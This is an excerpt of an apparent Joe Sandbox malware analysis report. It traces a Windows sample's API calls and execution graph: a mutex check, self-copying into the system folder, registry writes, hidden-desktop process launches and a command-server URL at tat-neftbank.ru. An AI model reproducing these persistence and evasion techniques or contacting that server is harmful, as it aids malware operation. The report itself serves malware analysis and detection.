                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403780
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403798
                            • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080), ref: 0040379E
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandlePointerWrite
                            • String ID:
                            • API String ID: 3604237281-0
                            • Opcode ID: dac2396c127bae0588a020e64ec8d65c8c20fafefb6c849fc3be04b1fb147846
                            • Instruction ID: cf1cf3c615f6ac6775c7614bbea78a1f327309af87cada33f382846b8ae172d8
                            • Opcode Fuzzy Hash: dac2396c127bae0588a020e64ec8d65c8c20fafefb6c849fc3be04b1fb147846
                            • Instruction Fuzzy Hash: 1BF0E972B442143AE62029758C03FDE355D8B41B78F144131FB10FB1D1D5B8BA0142AD
                            Function 0040185F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 152COMMON
                            Download Yara Rule
                            APIs
                            • GetWindowTextA.USER32(?,?,?), ref: 004018E2
                            • _sleep.CRTDLL(00000000), ref: 00401985
                            Strings
                            • Microsoft Internet Explorer, xrefs: 004018E9
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: TextWindow_sleep
                            • String ID: Microsoft Internet Explorer
                            • API String ID: 2600969163-3125735337
                            • Opcode ID: 2f2919c86dfda4ef7c58b175597176eedc8b81590a8529b1749621bc65d83200
                            • Instruction ID: b939d44f97a8665b9279395720dceab0b5e56fea97a4cdd5017e5321b1dcff8d
                            • Opcode Fuzzy Hash: 2f2919c86dfda4ef7c58b175597176eedc8b81590a8529b1749621bc65d83200
                            • Instruction Fuzzy Hash: 0B511D71A00215EFDB20CFA8D884BAAB7F4BB18315F5041B6E904E72A0D7749995CF59
                            Function 0040682B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00406753: CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
                              • Part of subcall function 00406753: GetFileSize.KERNEL32(00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 0040679E
                              • Part of subcall function 00406753: CloseHandle.KERNEL32(00000000,00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 004067A6
                            • _sleep.CRTDLL(000927C0,00418E30,http://tat-neftbank.ru/kkq.php,ofs_kk), ref: 00406854
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize_sleep
                            • String ID: http://tat-neftbank.ru/kkq.php$ofs_kk
                            • API String ID: 4235044784-1201080362
                            • Opcode ID: 616e9dee88e1a58cfa8eb2cd68ddd21616f6de5f00dd5623ea3079b7e2cd762d
                            • Instruction ID: fffe33e14b07b0123592d698d33e8a34a507cc30d1f0c5c96ad3af2b43ec03e4
                            • Opcode Fuzzy Hash: 616e9dee88e1a58cfa8eb2cd68ddd21616f6de5f00dd5623ea3079b7e2cd762d
                            • Instruction Fuzzy Hash: ADD05E72B453043B9200757E9D07929F5CE4AA0AA83B9446BBA01F73F1E8F89E1151AB

                            Execution Graph

                            Execution Coverage:5.4%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:0%
                            Total number of Nodes:542
                            Total number of Limit Nodes:2
                            execution_graph 2706 403840 printf 2707 403880 2706->2707 2708 403884 printf 2707->2708 2709 40386d printf 2707->2709 2709->2707 2715 4052e0 2716 4052ec strcat strcat 2715->2716 2732 40431f 2716->2732 2719 405360 2720 40537c CreateProcessA 2719->2720 2721 405469 2720->2721 2722 4053ac CloseHandle sprintf 2720->2722 2723 405492 DeleteFileA LocalFree TerminateProcess CloseHandle 2721->2723 2724 405413 2722->2724 2725 4054d0 2723->2725 2726 4053e5 FindWindowA 2724->2726 2727 40541d 2724->2727 2726->2727 2728 405402 Sleep 2726->2728 2727->2721 2729 405421 Sleep 2727->2729 2728->2724 2730 405434 Sleep 2729->2730 2731 40543e GetWindowTextA 2729->2731 2730->2731 2731->2721 2733 404341 GetCurrentThreadId GetThreadDesktop 2732->2733 2734 404364 CreateDesktopA 2732->2734 2735 40438e SetThreadDesktop 2733->2735 2736 40435f memset 2733->2736 2734->2735 2734->2736 2735->2736 2736->2719 2736->2720 2839 401581 2840 4015c8 2839->2840 2841 4015a2 rand 2840->2841 2842 4015cc 2840->2842 2841->2840 2737 403562 GetModuleFileNameA 2738 403588 2737->2738 2999 402ba3 3000 402a89 2999->3000 3001 402cd2 3000->3001 3002 402cad GetCurrentProcessId 3000->3002 3003 402b2a GetModuleHandleA GetProcAddress 3000->3003 3002->3000 3003->3000 2739 4077e4 2740 407808 2739->2740 2747 40789e 2739->2747 2741 407820 SetFocus 2740->2741 2742 40782b 2740->2742 2740->2747 2741->2742 2743 407833 SetFocus 2742->2743 2744 40783e 2742->2744 2743->2744 2745 407857 2744->2745 2746 40784c SetFocus 2744->2746 2748 40786a 2745->2748 2749 40785f SetFocus 2745->2749 2746->2745 2752 407910 2747->2752 2753 4078fe CallWindowProcA 2747->2753 2750 407872 SetFocus 2748->2750 2751 40787d 2748->2751 2749->2748 2750->2751 2751->2747 2754 407885 SetFocus 2751->2754 2753->2752 2754->2747 2843 405c09 lstrlenA GetTickCount srand 2876 40509b 2843->2876 2848 405f54 2849 405caf ExpandEnvironmentStringsA 2890 40570c 2849->2890 2852 405ceb strcat strcat 2853 40431f 4 API calls 2852->2853 2854 405d14 memset 2853->2854 2855 405d72 CreateProcessA 2854->2855 2856 405d56 2854->2856 2857 405da2 CloseHandle sprintf 2855->2857 2858 405f24 DeleteFileA TerminateProcess CloseHandle 2855->2858 2856->2855 2859 405e09 2857->2859 2858->2848 2860 405e13 2859->2860 2861 405ddb FindWindowA 2859->2861 2860->2858 2863 405e1b Sleep GetWindowTextA 2860->2863 2861->2860 2862 405df8 Sleep 2861->2862 2862->2859 2864 405e50 2863->2864 2864->2858 2929 405613 2864->2929 2866 405e6b 2866->2858 2867 405e76 CopyFileA 2866->2867 2868 403619 5 API calls 2867->2868 2869 405e9c DeleteFileA lstrlenA strncmp 2868->2869 2870 405ec6 lstrlenA 2869->2870 2871 405eef 2869->2871 2937 403743 CreateFileA 2870->2937 2873 403743 4 API calls 2871->2873 2874 405eea LocalFree 2873->2874 2874->2858 2877 4050ea 2876->2877 2878 4050b6 sprintf 2877->2878 2879 4050f8 2877->2879 2940 4041f4 2878->2940 2880 4041f4 4 API calls 2879->2880 2882 40510e 2880->2882 2943 4041c3 lstrlenA 2882->2943 2885 40429c RegOpenKeyExA 2886 4042e0 RegQueryValueExA 2885->2886 2887 4042dc 2885->2887 2888 404304 RegCloseKey 2886->2888 2889 4042f8 RegCloseKey 2886->2889 2887->2848 2887->2849 2888->2887 2889->2887 2891 4079e4 2890->2891 2892 405719 GetTempPathA 2891->2892 2893 405746 2892->2893 2893->2893 2951 4015ea 2893->2951 2896 405798 strcat 2897 4057ac rand 2896->2897 2898 4057e7 rand 2897->2898 2899 4057be rand sprintf 2897->2899 2900 4057f9 strcat 2898->2900 2901 40580d strcat rand 2898->2901 2899->2898 2900->2901 2902 405839 strcat 2901->2902 2903 40584d rand 2901->2903 2902->2903 2904 405888 sprintf rand 2903->2904 2905 40585f rand sprintf 2903->2905 2906 4058c3 strcat 2904->2906 2907 4058d7 strcat rand 2904->2907 2905->2904 2906->2907 2908 405911 strcat rand 2907->2908 2909 4058fd strcat 2907->2909 2910 405966 strcat rand 2908->2910 2911 40593d rand sprintf 2908->2911 2909->2908 2912 4059a0 strcat rand 2910->2912 2913 40598c strcat 2910->2913 2911->2910 2914 4059d2 strcat 2912->2914 2915 4059e6 strcat rand 2912->2915 2913->2912 2914->2915 2916 405a20 sprintf rand 2915->2916 2917 405a0c strcat 2915->2917 2918 405a70 strcat rand 2916->2918 2919 405a5c strcat 2916->2919 2917->2916 2920 405ab0 rand sprintf rand 2918->2920 2921 405a9c strcat 2918->2921 2919->2918 2922 405af3 strcat 2920->2922 2923 405b07 strcat rand 2920->2923 2921->2920 2922->2923 2924 405b39 strcat 2923->2924 2925 405b4d rand 2923->2925 2924->2925 2926 405b88 strcat CreateFileA lstrlenA WriteFile CloseHandle 2925->2926 2927 405b5f rand sprintf 2925->2927 2928 405c04 2926->2928 2927->2926 2928->2848 2928->2852 2930 4079e4 2929->2930 2931 405620 FindFirstUrlCacheEntryA 2930->2931 2932 405663 _stricmp 2931->2932 2933 405685 2931->2933 2932->2933 2934 4056a7 FindNextUrlCacheEntryA 2932->2934 2933->2866 2934->2933 2935 4056c9 _stricmp 2934->2935 2935->2933 2936 4056fb 2935->2936 2936->2934 2938 403775 2937->2938 2939 403779 SetFilePointer WriteFile CloseHandle 2937->2939 2938->2874 2939->2938 2946 40421f RegCreateKeyExA 2940->2946 2944 40421f 4 API calls 2943->2944 2945 4041ee InterlockedIncrement memset 2944->2945 2945->2885 2947 404262 RegSetValueExA 2946->2947 2948 404219 2946->2948 2949 404288 RegCloseKey 2947->2949 2950 40427c RegCloseKey 2947->2950 2948->2877 2949->2948 2950->2948 2952 401634 2951->2952 2953 401638 strcat sprintf rand 2952->2953 2954 40160e rand 2952->2954 2953->2896 2953->2897 2954->2952 3004 4037aa 3006 4037c8 printf printf 3004->3006 3007 40380d 3006->3007 3008 4037fa printf 3007->3008 3010 403812 printf 3007->3010 3008->3007 3011 4035ab 3012 4079e4 3011->3012 3013 4035b8 vsprintf 3012->3013 3016 4035f9 MessageBoxA 3013->3016 3015 4035ea 3016->3015 2755 40686c lstrlenA 2756 405f5b 9 API calls 2755->2756 2757 40689a 2756->2757 2758 4068a1 WinExec 2757->2758 2759 4068a9 2757->2759 2758->2759 2955 40328f 2965 402efd 2955->2965 2956 402cd7 3 API calls 2956->2965 2957 4033ce 2958 40289a 4 API calls 2958->2965 2959 4030e5 GetModuleHandleA 2959->2965 2960 40314c VirtualQuery 2961 4031b1 IsBadWritePtr 2960->2961 2960->2965 2961->2965 2962 402f98 GlobalMemoryStatus 2962->2965 2963 402f6f IsBadReadPtr 2963->2965 2964 403059 CloseHandle 2964->2965 2965->2956 2965->2957 2965->2958 2965->2959 2965->2960 2965->2962 2965->2963 2965->2964 2966 407892 2967 40789e 2966->2967 2968 407910 2967->2968 2969 4078fe CallWindowProcA 2967->2969 2969->2968 3017 405133 10 API calls 3018 40429c 4 API calls 3017->3018 3019 405264 3018->3019 3020 405278 3019->3020 3021 40526b LocalFree 3019->3021 3023 40509b 6 API calls 3020->3023 3022 4054d0 3021->3022 3024 40527d ExpandEnvironmentStringsA 3023->3024 3043 404532 3024->3043 3027 4052d3 LocalFree 3027->3022 3028 4052ec strcat strcat 3029 40431f 4 API calls 3028->3029 3030 405315 memset 3029->3030 3031 405360 3030->3031 3032 40537c CreateProcessA 3030->3032 3031->3032 3033 4053ac CloseHandle sprintf 3032->3033 3042 405469 3032->3042 3035 405413 3033->3035 3034 405492 DeleteFileA LocalFree TerminateProcess CloseHandle 3034->3022 3036 4053e5 FindWindowA 3035->3036 3037 40541d 3035->3037 3036->3037 3038 405402 Sleep 3036->3038 3039 405421 Sleep 3037->3039 3037->3042 3038->3035 3040 405434 Sleep 3039->3040 3041 40543e GetWindowTextA 3039->3041 3040->3041 3041->3042 3042->3034 3044 40453f 3043->3044 3045 403619 5 API calls 3044->3045 3046 404570 3045->3046 3047 404579 3046->3047 3048 404596 lstrlenA LocalAlloc GetTempPathA 3046->3048 3049 404589 LocalFree 3046->3049 3047->3027 3047->3028 3050 404604 3048->3050 3049->3047 3050->3050 3051 4015ea rand 3050->3051 3052 40461d strcat sprintf rand 3051->3052 3053 404655 strcat 3052->3053 3054 404668 rand 3052->3054 3053->3054 3055 40467a rand sprintf 3054->3055 3056 40469d rand 3054->3056 3055->3056 3057 4046bb strcat 3056->3057 3058 4046ce strcat rand 3056->3058 3057->3058 3059 4046f3 strcat 3058->3059 3060 404706 rand 3058->3060 3059->3060 3061 404741 sprintf rand 3060->3061 3062 40471e rand sprintf 3060->3062 3063 404770 strcat 3061->3063 3064 404783 strcat rand 3061->3064 3062->3061 3063->3064 3065 4047a8 strcat 3064->3065 3066 4047bb strcat rand 3064->3066 3065->3066 3067 4047e6 rand sprintf 3066->3067 3068 404809 rand sprintf sprintf rand 3066->3068 3067->3068 3069 404859 rand sprintf 3068->3069 3070 40487c rand 3068->3070 3069->3070 3071 404894 strcat 3070->3071 3072 4048a7 rand 3070->3072 3071->3072 3073 4048b9 strcat 3072->3073 3074 4048cc rand 3072->3074 3073->3074 3075 4048f1 sprintf rand 3074->3075 3076 4048de strcat 3074->3076 3077 404926 strcat 3075->3077 3078 404939 rand 3075->3078 3076->3075 3077->3078 3079 40494b strcat 3078->3079 3080 40495e rand 3078->3080 3079->3080 3081 404976 rand sprintf 3080->3081 3082 404999 3080->3082 3081->3082 3088 4049a3 3082->3088 3109 404b12 3082->3109 3083 404b07 3085 404c87 strcat rand 3083->3085 3084 4043bf 2 API calls 3084->3109 3086 404cac strcat 3085->3086 3087 404cbf rand 3085->3087 3086->3087 3091 404cd1 strcat 3087->3091 3092 404ce4 rand 3087->3092 3088->3083 3089 404a4b sprintf rand 3088->3089 3090 4049d9 sprintf 3088->3090 3093 404a82 strcat 3089->3093 3094 404a95 rand 3089->3094 3090->3088 3091->3092 3096 404cf6 strcat 3092->3096 3097 404d09 strcat rand 3092->3097 3093->3094 3098 404aa7 strcat 3094->3098 3099 404aba rand 3094->3099 3095 404b47 sprintf 3095->3109 3096->3097 3100 404d34 rand sprintf 3097->3100 3101 404d57 rand 3097->3101 3098->3099 3099->3088 3102 404acc strcat 3099->3102 3100->3101 3103 404d69 strcat 3101->3103 3104 404d7c rand 3101->3104 3102->3088 3103->3104 3105 404da1 rand 3104->3105 3106 404d8e strcat 3104->3106 3107 404db9 strcat 3105->3107 3108 404dcc rand 3105->3108 3106->3105 3107->3108 3110 404e01 strcat rand 3108->3110 3111 404dde rand sprintf 3108->3111 3109->3084 3109->3085 3109->3095 3136 40447a lstrlenA LocalAlloc 3109->3136 3113 404e2c strcat 3110->3113 3114 404e3f strcat rand 3110->3114 3111->3110 3113->3114 3116 404e64 strcat 3114->3116 3117 404e77 strcat rand 3114->3117 3116->3117 3120 404ea2 strcat 3117->3120 3121 404eb5 sprintf rand 3117->3121 3118 404c02 rand 3122 404c14 strcat 3118->3122 3123 404c27 rand 3118->3123 3119 404bef strcat 3119->3118 3120->3121 3126 404ee3 strcat 3121->3126 3127 404ef6 strcat rand 3121->3127 3122->3123 3124 404c39 strcat 3123->3124 3125 404c4c LocalFree 3123->3125 3124->3125 3125->3109 3126->3127 3128 404f27 strcat 3127->3128 3129 404f3a rand sprintf rand 3127->3129 3128->3129 3130 404f77 strcat 3129->3130 3131 404f8a strcat rand 3129->3131 3130->3131 3132 404fb5 strcat 3131->3132 3133 404fc8 rand 3131->3133 3132->3133 3134 404fda rand sprintf 3133->3134 3135 404ffd 7 API calls 3133->3135 3134->3135 3135->3047 3137 4044b6 3136->3137 3138 4044d9 sprintf 3137->3138 3139 40452a sprintf rand 3137->3139 3138->3137 3139->3118 3139->3119 3140 401b33 3143 401aa4 3140->3143 3141 401b13 3142 401ae6 sprintf 3145 40129c 3142->3145 3143->3141 3143->3142 3146 4012a9 CreateFileA 3145->3146 3147 4079e4 3145->3147 3148 4012db ReadFile CloseHandle 3146->3148 3149 4012d7 3146->3149 3147->3146 3148->3149 3149->3141 3150 4036b3 CreateFileA 3151 4036e3 3150->3151 3152 4036e7 SetFilePointer 3150->3152 3153 403701 3152->3153 3153->3153 3154 403708 WriteFile WriteFile CloseHandle 3153->3154 3154->3151 2760 406ff6 2761 4071a4 2760->2761 2762 40701f 2760->2762 2763 40717e 2761->2763 2764 4071be DestroyWindow 2761->2764 2765 407021 2762->2765 2766 40702f 2762->2766 2764->2763 2767 407184 2765->2767 2768 40702a 2765->2768 2769 407289 GetWindowTextA 2766->2769 2770 40703a 2766->2770 2767->2763 2771 407198 PostQuitMessage 2767->2771 2772 4077cc DefWindowProcA 2768->2772 2775 4072c9 GetWindowTextA 2769->2775 2776 4072a9 MessageBoxA SetFocus 2769->2776 2773 407041 2770->2773 2774 40705c 2770->2774 2771->2763 2772->2763 2773->2768 2773->2772 2780 4071cb 2773->2780 2779 407149 2774->2779 2816 405ffa 2774->2816 2777 407322 2775->2777 2778 407302 MessageBoxA SetFocus 2775->2778 2776->2763 2784 407337 MessageBoxA SetFocus 2777->2784 2793 407357 2777->2793 2778->2763 2779->2763 2823 406075 2779->2823 2780->2763 2786 407224 SetTextColor 2780->2786 2788 407233 SetTextColor 2780->2788 2784->2763 2785 405ffa 3 API calls 2787 40709b GetWindowRect 2785->2787 2789 40723d SetBkColor CreateBrushIndirect 2786->2789 2787->2779 2790 4070be GetWindowRect 2787->2790 2788->2789 2789->2763 2790->2779 2792 4070d4 2790->2792 2791 4073a7 sprintf GetWindowTextA 2795 40740f sprintf GetWindowTextA 2791->2795 2796 4073ef MessageBoxA SetFocus 2791->2796 2792->2779 2797 407112 MoveWindow 2792->2797 2793->2791 2794 407376 MessageBoxA SetFocus 2793->2794 2794->2763 2798 407477 sprintf GetWindowTextA 2795->2798 2799 407457 MessageBoxA SetFocus 2795->2799 2796->2763 2797->2779 2800 4074d9 2798->2800 2801 4074b9 MessageBoxA SetFocus 2798->2801 2799->2763 2802 4074ee MessageBoxA SetFocus 2800->2802 2804 40750e 2800->2804 2801->2763 2802->2763 2803 40755e sprintf GetWindowTextA 2806 4075a6 MessageBoxA SetFocus 2803->2806 2807 4075c6 2803->2807 2804->2803 2805 40752d MessageBoxA SetFocus 2804->2805 2805->2763 2806->2763 2808 407627 sprintf CreateFileA SetFilePointer 2807->2808 2809 4075e5 MessageBoxA SetFocus 2807->2809 2810 40768e 2808->2810 2809->2763 2810->2810 2811 407695 WriteFile WriteFile 2810->2811 2812 4076db 2811->2812 2812->2812 2813 4076e2 6 API calls 2812->2813 2814 40776e 2813->2814 2814->2814 2815 407775 WriteFile WriteFile CloseHandle ShowWindow 2814->2815 2815->2763 2817 4079e4 2816->2817 2818 406007 GetWindow 2817->2818 2820 406020 2818->2820 2819 406028 GetClassNameA 2819->2820 2820->2819 2821 406024 2820->2821 2822 40605f GetWindow 2820->2822 2821->2785 2822->2820 2824 405ffa 3 API calls 2823->2824 2825 406096 2824->2825 2826 405ffa 3 API calls 2825->2826 2827 4060a3 10 API calls 2826->2827 2828 406224 SendMessageA 2827->2828 2829 40623a SendMessageA 2827->2829 2830 40624e CreateWindowExA CreateWindowExA 2828->2830 2829->2830 2831 406333 2830->2831 2832 4062cb sprintf SendMessageA sprintf SendMessageA 2831->2832 2833 40633c 34 API calls 2831->2833 2832->2831 2833->2763 2970 401219 2971 40121f __GetMainArgs 2970->2971 2972 407980 173 API calls 2971->2972 2973 401284 exit 2972->2973 2974 40109a 2982 40109b 2974->2982 2975 40117f 2976 40118e signal 2975->2976 2977 4011a8 signal 2976->2977 2978 4011c9 2976->2978 2977->2978 2979 40117b 2977->2979 2978->2979 2980 4011ce signal raise 2978->2980 2980->2979 2982->2975 2982->2976 2982->2979 2983 40107a RtlUnwind 2982->2983 2983->2982 2834 40237b 2835 402333 _sleep 2834->2835 2836 402355 2834->2836 2837 401b9f 23 API calls 2835->2837 2838 40234c 2837->2838 2838->2835 2838->2836 2984 40109b 2985 40117f 2984->2985 2992 4010c3 2984->2992 2986 40118e signal 2985->2986 2987 4011a8 signal 2986->2987 2988 4011c9 2986->2988 2987->2988 2989 40117b 2987->2989 2988->2989 2990 4011ce signal raise 2988->2990 2990->2989 2992->2986 2992->2989 2993 40107a RtlUnwind 2992->2993 2993->2992 2994 40129b 2995 4079e4 2994->2995 2996 4012a9 CreateFileA 2995->2996 2997 4012db ReadFile CloseHandle 2996->2997 2998 4012d7 2996->2998 2997->2998 2710 40365e 2711 403664 GetFileSize LocalAlloc 2710->2711 2712 403684 ReadFile CloseHandle 2711->2712 2714 4036ae 2712->2714 2529 40121f __GetMainArgs 2532 407980 GetCommandLineA 2529->2532 2533 407991 strchr 2532->2533 2535 4079a6 2532->2535 2534 4079cf GetModuleHandleA 2533->2534 2533->2535 2538 406c29 OpenMutexA 2534->2538 2535->2534 2539 406c6d GetVersionExA GetSystemDirectoryA GetTickCount srand GetModuleFileNameA 2538->2539 2540 406c5f CloseHandle exit 2538->2540 2541 406cd6 2539->2541 2540->2539 2542 406ce4 rand 2541->2542 2543 406e07 9 API calls 2541->2543 2545 406d5f 2542->2545 2585 402e06 2543->2585 2547 406d69 rand 2545->2547 2548 406d2f rand 2545->2548 2551 406d8a sprintf CopyFileA 2547->2551 2552 406d7c 2547->2552 2548->2545 2549 406f65 2601 4023a7 CreateThread CloseHandle 2549->2601 2550 406f2d GetModuleHandleA GetProcAddress GetCurrentProcessId 2550->2549 2562 403ce9 rand 2551->2562 2552->2551 2556 406f6a CreateThread CloseHandle CreateThread CloseHandle SetTimer 2558 406fdc GetMessageA 2556->2558 2653 4068b0 2556->2653 2671 40682b 2556->2671 2560 406fc4 TranslateMessage DispatchMessageA 2558->2560 2561 401284 exit 2558->2561 2560->2558 2563 403d27 2562->2563 2564 403d2e 2562->2564 2573 403f68 rand 2563->2573 2602 403619 CreateFileA 2564->2602 2567 403d47 memcpy memset 2569 403da1 rand rand rand rand memcpy 2567->2569 2570 403e64 2569->2570 2608 403bbe 2570->2608 2574 404002 2573->2574 2575 403fd4 rand 2574->2575 2576 404009 rand 2574->2576 2575->2574 2577 40402a 6 API calls 2576->2577 2578 40401c 2576->2578 2613 404148 RegCreateKeyExA 2577->2613 2578->2577 2580 4040f5 2581 404148 3 API calls 2580->2581 2582 404125 2581->2582 2583 404148 3 API calls 2582->2583 2584 40413a WinExec ExitProcess 2583->2584 2586 402e13 2585->2586 2616 402822 6 API calls 2586->2616 2588 402e1b GetVersion 2589 402e2e 2588->2589 2590 402e79 LoadLibraryA GetProcAddress 2589->2590 2600 402ef6 2589->2600 2590->2589 2591 4033ce GetVersion 2591->2549 2591->2550 2593 4030e5 GetModuleHandleA 2593->2600 2594 40314c VirtualQuery 2595 4031b1 IsBadWritePtr 2594->2595 2594->2600 2595->2600 2596 402f98 GlobalMemoryStatus 2596->2600 2597 402f6f IsBadReadPtr 2597->2600 2598 403059 CloseHandle 2598->2600 2600->2591 2600->2593 2600->2594 2600->2596 2600->2597 2600->2598 2617 40289a 2600->2617 2621 402cd7 2600->2621 2601->2556 2630 4022ee 2601->2630 2603 403664 GetFileSize LocalAlloc 2602->2603 2604 40364e 2602->2604 2605 403684 ReadFile CloseHandle 2603->2605 2604->2603 2607 4036ae 2604->2607 2605->2607 2607->2563 2607->2567 2610 403bfd 2608->2610 2609 403ce4 CreateFileA WriteFile CloseHandle LocalFree 2609->2563 2610->2609 2611 403c20 rand 2610->2611 2612 403c80 memset memcpy memcpy 2610->2612 2611->2610 2612->2610 2614 404193 2613->2614 2614->2614 2615 40419a RegSetValueExA RegCloseKey 2614->2615 2615->2580 2616->2588 2618 4028c6 GetSecurityInfo SetEntriesInAclA SetSecurityInfo CloseHandle 2617->2618 2620 4029cd 2618->2620 2620->2600 2622 402ceb 2621->2622 2624 402d13 2622->2624 2625 402a72 2622->2625 2624->2600 2628 402a89 2625->2628 2626 402cd2 2626->2624 2627 402b2a GetModuleHandleA GetProcAddress 2627->2628 2628->2626 2628->2627 2629 402cad GetCurrentProcessId 2628->2629 2629->2628 2631 402333 _sleep 2630->2631 2635 401b9f 2631->2635 2651 4079e4 2635->2651 2652 4079e5 2651->2652 2652->2652 2668 4068c7 2653->2668 2655 406c0c _sleep 2655->2668 2656 403619 5 API calls 2656->2668 2658 406c01 LocalFree 2658->2655 2659 406941 sscanf 2660 406972 rand 2659->2660 2659->2668 2660->2668 2661 406a84 atoi 2664 406aad sprintf 2661->2664 2661->2668 2662 4069a4 sprintf sprintf 2665 406a27 DeleteFileA sprintf WinExec 2662->2665 2663 4069db GetWindowsDirectoryA sprintf strcat 2663->2665 2664->2668 2665->2668 2666 406add lstrlenA 2666->2668 2667 406b20 sprintf lstrlenA lstrlenA LocalAlloc 2667->2668 2668->2655 2668->2656 2668->2658 2668->2659 2668->2661 2668->2662 2668->2663 2668->2666 2668->2667 2669 406b9b lstrlenA 2668->2669 2670 406bbe CreateThread CloseHandle 2668->2670 2675 405f5b lstrlenA lstrlenA LocalAlloc 2668->2675 2680 4043bf 2668->2680 2669->2668 2670->2668 2672 40683b 2671->2672 2688 406753 CreateFileA 2672->2688 2686 407a04 2675->2686 2677 405f9b lstrlenA 2687 407a04 2677->2687 2679 405fb4 DeleteUrlCacheEntry CreateThread WaitForSingleObject GetExitCodeThread CloseHandle 2679->2668 2681 4043dc 2680->2681 2682 40441a 2681->2682 2684 4043e2 memcpy 2681->2684 2683 404441 lstrlenA 2682->2683 2685 40442f 2682->2685 2683->2685 2684->2685 2685->2668 2686->2677 2687->2679 2689 40678f GetFileSize CloseHandle 2688->2689 2695 40681a _sleep 2688->2695 2696 4013cc RegOpenKeyExA 2689->2696 2695->2672 2697 4013fa 2696->2697 2698 4013fe RegQueryValueExA RegCloseKey 2696->2698 2697->2695 2699 4054d7 6 API calls 2697->2699 2698->2697 2700 405586 2699->2700 2701 4055ce CreateThread WaitForSingleObject GetExitCodeThread CloseHandle 2700->2701 2702 40560e 2701->2702 2702->2695 2703 401348 RegCreateKeyExA 2702->2703 2704 40138a RegSetValueExA RegCloseKey 2703->2704 2705 401386 2703->2705 2704->2705 2705->2695

                            Executed Functions

                            Function 00406C29 Relevance: 82.5, APIs: 36, Strings: 11, Instructions: 264windowthreadregistryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • OpenMutexA.KERNEL32(001F0001,00000000,QueenKarton_12), ref: 00406C50
                            • CloseHandle.KERNEL32(00000000,00000000), ref: 00406C60
                            • exit.CRTDLL(00000001,00000000,00000000), ref: 00406C67
                            • GetVersionExA.KERNEL32(00418D50,00000000), ref: 00406C8A
                            • GetSystemDirectoryA.KERNEL32(00429080,000000FF), ref: 00406C99
                            • GetTickCount.KERNEL32 ref: 00406C9E
                            • srand.CRTDLL(00000000,00418D50,00000000), ref: 00406CA4
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00418D50,00000000), ref: 00406CBE
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D03
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D2F
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D70
                            • sprintf.CRTDLL(?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00406DA8
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00406DBD
                            • WinExec.KERNEL32(?,00000000), ref: 00406DEC
                            • ExitProcess.KERNEL32(00000001,?,?,?,?,?,?,00418D50,00000000), ref: 00406E02
                            • sprintf.CRTDLL(00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E1B
